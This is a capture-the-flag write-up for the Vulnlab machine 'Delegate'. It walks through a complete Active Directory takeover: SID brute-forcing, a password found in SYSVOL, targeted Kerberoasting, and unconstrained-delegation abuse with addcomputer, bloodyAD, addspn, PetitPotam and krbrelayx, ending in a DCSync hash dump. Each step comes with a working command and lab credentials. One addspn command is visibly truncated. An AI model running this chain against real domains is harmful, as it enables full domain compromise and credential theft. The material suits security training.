Vulnlab — Delegate

ARZ101
5 min readOct 29, 2023

Delegate is a medium rated machine which consisted of enumerating smb shares to find credentials of a user which had GenericWrite over a user object which was abused through Targeted Kerberoasting, having SeEnableDelegation privilege this lead to Unconstrained Delegation and then performing DCsync.


PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec
135/tcp open msrpc Microsoft Windows RPC
139/tcp open tcpwrapped
445/tcp open tcpwrapped
464/tcp open tcpwrapped
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=DC1.delegate.vl
| Issuer: commonName=DC1.delegate.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-09-30T15:47:02
| Not valid after: 2024-03-31T15:47:02
| MD5: 3a340b861cd985281f509d995bef9f4a
|_SHA-1: ccc740dd30a643bfc26e0b7f5d018da28d7e1630
5985/tcp open

Enumerating smb with anonymous user doesn’t show any interesting shares

We can however enumerate domain users with lookupsid using a guest account by brute forcing SIDs

lookupsid.py guest@delegate.vl 10000

Having the domain users, we can check if there’s any account having pre-authentication disabled which can lead to AS-REP roasting

Going back to shares and accessing SYSVOL , we can find users.bat file having a password

Spraying this password on the users we have confirms that this password belongs A.Briggs

Running python-bloodhound to enumerate the domain

python3 bloodhound.py -d 'delegate.vl' -u 'A.Briggs' -p 'P4ssw0rd1#123' -c all -ns 10.10.70.255

From bloodhound we can see A.Briggs has GenericWrite on N.thompson

This can abuse either through Shadow credentials or associating a SPN to N.Thompson for Targeted kerberoasting, I tried to add shadow credentials by editing msDS-KeyCredentialLink but due to PKINT not being supported by DC it didn't worked

Attempting to perform targeted kerberoasting

python3 /opt/targetedKerberoast/targetedKerberoast.py -u 'A.Briggs' -p 'P4ssw0rd1#123' --request-user N.Thompson -d 'delegate.vl'

Cracking the hash with hashcat

Since N.Thompson has CanPSRemote we can login through WinRM

This user belongs to Delegation Admins but there wasn't ACLs on bloodhound for that group

Checking privileges of this user shows that it has SeEnableDelegationPrivilege enabled

This means that we can abuse unconstrained delegation by creating machine account and append a SPN to it, before that we need to make sure if machine quota isn’t 0

First creating a machine account with addcomputer.py

addcomputer.py -dc-ip 10.10.70.255 -computer-pass TestPassword321 -computer-name UwU delegate.vl/N.Thompson:'KALEB_2341'

Adding DNS record for the machine account we created

python3 dnstool.py -u 'delegate.vl\UwU$' -p TestPassword321 -r UwU.delegate.vl -d 10.8.0.136 --action add DC1.delegate.vl -dns-ip 10.10.70.255

To abuse unconstrained delegation the machine account needs to have a SPN and TRUSTED_FOR_DELEGATION UAC, using bloodyAD we can add the UAC

python3 /opt/bloodyAD/bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION

Appending SPN with addspn via msDS-AdditionalDnsHostName

python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.85.247 DC1.delegate.vl --additional

python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.85.247 DC1.delegate.v

Now running krbrelayx first by coercing authentication (using any poc i.e petipotam, printerbug, dfscoerce ) from DC1 to our added machine with unconstrained delegation enabled, this will grab the copy of DC1’s TGT which gets stored in the memory of machine account h for the purpose of accessing resources which can be abused to perform DCsync

python3 PetitPotam.py -u 'UwU$' -p 'TestPassword321' UwU.delegate.vl 10.10.85.247
python3 ./krbrelayx.py -hashes :C7BE3644A2EB37C9BB1F248E9E0B9AFC

Having the ticket, we can export it and perform dcsync hashes with secretsdump

secretsdump.py 'DC1$'@DC1.delegate.vl -k -no-pass

References

--

--